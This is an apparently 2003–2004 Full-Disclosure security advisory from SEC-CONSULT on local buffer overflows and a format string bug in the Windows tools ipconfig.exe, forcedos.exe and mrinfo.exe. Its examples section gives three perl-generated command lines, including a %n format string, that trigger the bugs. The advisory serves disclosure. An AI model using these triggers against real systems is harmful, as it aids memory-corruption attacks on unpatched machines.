========================================
Microsoft commandline tools BOF s
========================================
Product: Windows-2000 SP4 / Windows-XP SP2
Vulnerablities:
- Buffer Overflow (no privilege escalation)
Vendor: Microsoft (http://www.microsoft.com/)
Vendor-Status: vendor contacted (between 2002 and 2003)
Vendor-Patches: ipconfig (XP-SP 2) / forcedos.exe and mrinfo.exe not available
Objects: ipconfig.exe / forcedos.exe / mrinfo.exe
Exploitable:
Local: PARTIAL
Remote: NO
============
Introduction
============
---
=====================
Vulnerability Details
=====================
1) LOCAL BUFFER OVERFLOWS / FORMAT STRING VULNERABILITY
=======================================================
OBJECTS:
ipconfig.exe (only Windows-2000 SP4)
forcedos.exe
mrinfo.exe
DESCRIPTION:
Insufficient input-validation leads to a) stack based bufferoverflows and b) format string- vulnerabilites.
EXAMPLES:
a) ipconfig.exe /`perl -e 'print "PAAAA\x44\x33\x22\x11","%08x"x13,"%n";'`
b) forcedos.exe `perl -e 'print "A"x6784;'`
c) mrinfo.exe -i `perl -e 'print "A"x60;'`
===============
GENERAL REMARKS
===============
Find related postings regarding this issue here: (http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2004-10/0065.html).
It is unlikely you to gain access or elevate priviledges thru "forcedos.exe" and "mrinfo.exe".
Nevertheless it might be possible to misuse "ipconfig.exe" in an "restricted" environment with DHCP enabled !!
====================
Recommended Hotfixes
====================
---
EOF @2003 Brereton_paul_at_btinternet.com,m.eiszner_at_sec-consult.com
=======
Contact
=======
SEC-CONSULT
UK / EUROPE
Austria / EUROPE
Brereton_paul_at_btinternet.com
m.eiszner_at_sec-consult.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Nov 17 2004
Intro
